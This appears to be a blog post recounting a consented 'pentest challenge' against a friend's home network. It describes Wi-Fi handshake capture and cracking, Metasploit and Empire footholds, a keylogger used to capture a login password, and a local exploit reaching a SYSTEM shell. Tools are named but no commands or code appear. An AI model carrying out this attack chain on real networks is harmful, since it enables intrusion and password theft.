So the reason I am calling this a Pentest Challenge is cause it seems that a few people new to the industry don’t understand the fact of computer security seems that the famous ‘iPhone’ is still unbreakable and looks like they still don’t understand that this “hacking” can happen to ANYBODY you do not need to be a celebrity or any high status profile all you need to be in the eyes of a Hacker is a target and that will do .
They challenged me thinking that I can never gain access into there PC, which they gladly showed me [Cut’s enumeration time for me 🙂 ] but well I will continue with this since they said I am a “Hacker” I should be able to get everything from 0 just like in the movies so by that they mean I will need to crack the Wi-Fi key and gain Access to the PC with “Proof” so OK I was up to the task and this was a perfect situation for me since its kinda a real engagement but no AD so let’s get start it
I will start with the “easy” part getting the key so he gave me the name of his current WiFi network so I can start working on it I fire up Airodump-NG with my WiFi card and locate the target
After locating the target I proceeded to get a 4-way Handshake that will help me on getting the key, after waiting for clients, a DE-authentication was used with another tool called Aireplay-NG after a few attempts we can see in one of the terminals that a handshake was received
And we verified the handshake with any tool you are familiar with I utilized pyrit here for how easy and reliable it still is
Ok time to do a little more enumeration on the Device since there are no hints into his WiFi password and utilizing common word-lists I decided to go for a know attack called key-space attack you can find some info here so I decided to find info on the router and see what are its most common “keyspaces” related to the device, after hard research and lot’s of google I finally came up with a word-list capable of cracking the device, here is a shot of success (I needed a couple days for this to happen )
So let’s continue, after getting the WiFi key I did a simple arp-scan to check on the network devices see what’s connected or anything vulnerable that can help
So after locating the PC, I proceeded with an nmap scan, since I have no idea if he is aware of any of this, so I try to be as stealthy as possible and of course avoid anything on the PC for me to be detected
Wait what!!… The first thing I noticed HFS and I was wondering how did he mange to come up with this?? This reminds me a lot of HTB and other stuff for the OSCP students so I immediately knew exactly how to proceed and utilized our favorite tool Metasploit
Wow, access ( Don’t know why I am surprised )
So after checking around I wanted to continue and get SYSTEM access and give my friend his “Proof” so after this I utilized my one of my personal favorite Post-Exploitation Tool Empire so first we need to create the powershell listener and get it to the PC we will move to a shell and use this One-Liner from HAK5 and host the file from our attacking machine using python and then receive an agent
After this one-liner we received an Agent, let’s continue with this awesome tool
So with this we can continue enumerating and see what we can utilize in our advantage and up our privileges into the PC. I utilized an incredible script called Sherlock from the empire modules
So something can be utilized but we will continue with something else, messing with DLL is not my forte for the moment so I will try and search for another way, after more enumerating I found something to be of notice on the Desktop I utilized searchsploit to check it out
And the searchsploit came back with 1 result
So we will copy this exploit, move it to our folder and follow the instructions to receive a SYSTEM shell
The msfvenom command to replace the shellcode and start working
Awesome so with this we can utilize it and start working on that SYSTEM shell and finally complete this personal challenge, so I continued by figuring out how the heck am I going to access the PC since this exploit needs to be COPY AND PASTED into one of the fields of the application, so I had to go back and check some more
After checking I forgot something very important the RDP port is open, so this means, I have a chance into connecting into the PC with a full GUI but there was one issue, I don’t have a password….But as a penetration tester (ha ha) I decided that wasn’t going to stop me so I was trying many options hashes, Weak-Creds and Social Engineering but the first didn’t work because of my permissions and the others will take time and lot’s of luck since he is expecting this, so another idea came to mind a simple Key Logger, that’s where Empire strikes again I started running the key logger module and tested my Luck
Waited for a few hours and Success!!
Now with a password RDP was easy I utilized rdesktop to get access and and a full GUI screen welcomed me
Awesome so I continued into the privesc quest and went for the attack I initialized the vulnerable software, copied the exploit code format how its supposed to be and setup a listener on metasploit to listen for the connection, you might wonder “well hey since you have the password why didn’t you just escalate privileges with that!!” Simple the user wasn’t in the administrator group so it didn’t work and by luck this software was running with admin rights!!
W00t!! Finally the SYSTEM shell access I had everything I needed and a shell with the highest privileges now to finish this off I needed the proof.txt and I was done
So after some incredible adventure and see if I wasn’t getting rusty this finally came to an end and showed that not because you have the most sophisticated tech out there means that all is good we need to be aware of many other situations such as weak passwords or outdated software and hardware that can expose us to attacks such like these so one of my advice’s to him was to update his software or utilize a different one, for the time being of course not like all of them are protected but in this case any up to date software is safe in the meantime all that needs to be done is to be more aware of situations like these and don’t think that something is UNHACKABLE cause there will be someone out there with the time and skills to prove you wrong.
With this I end this post and be careful out there in cyberspace
Names, MAC, Software and other personal info has been changed and replicated in a safe environment so no personal information has been released